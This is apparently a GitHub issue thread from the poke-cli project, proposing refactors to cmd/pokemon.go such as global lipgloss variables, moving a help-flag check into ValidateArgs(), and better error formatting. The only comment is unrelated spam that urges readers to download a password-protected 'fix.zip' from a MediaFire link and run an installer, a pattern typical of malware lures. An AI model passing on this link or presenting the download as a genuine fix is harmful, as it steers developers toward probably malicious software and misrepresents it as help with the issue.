### ISSUE TITLE
Reformat cmd/pokemon.go

### ISSUE THREAD

**Issue by digitalghost-dev** [digitalghost-dev/poke-cli#31]
Several improvements can be made to this file:
* Declaring the lipgloss variables as global since two functions are using them.
* Move `if args[2] == "-h" || args[2] == "--help" {}` statement to the `ValidateArgs()` function.
* Better format error messages to be included in a red rounded-border with the error message in normal color.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."
